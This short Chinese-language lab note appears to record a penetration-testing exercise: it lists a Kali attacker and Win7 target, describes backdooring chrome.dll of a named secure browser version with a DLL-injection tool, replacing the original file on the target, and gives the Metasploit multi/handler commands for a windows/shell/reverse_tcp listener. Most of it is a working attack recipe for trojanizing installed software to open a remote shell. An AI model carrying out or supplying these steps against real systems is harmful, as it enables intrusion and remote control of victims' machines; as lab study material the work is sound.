#环境工具
kali #攻击机 172.20.152.11
win7 #目标机 172.20.152.8
backdoor #dll注入工具
procexp #线程分析工具
目标应用版本 #某60安全浏览器 12.2.1812.0
已知此应用chrome.dll存在dll注入
使用backdoor工具检测注入点
随便选择一个可写入空间较大的注入点进行注入
文件保存在backdoored目录下 复制到win7替换原文件
kali设置监听
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost 172.20.152.11
set lport 1111
exploit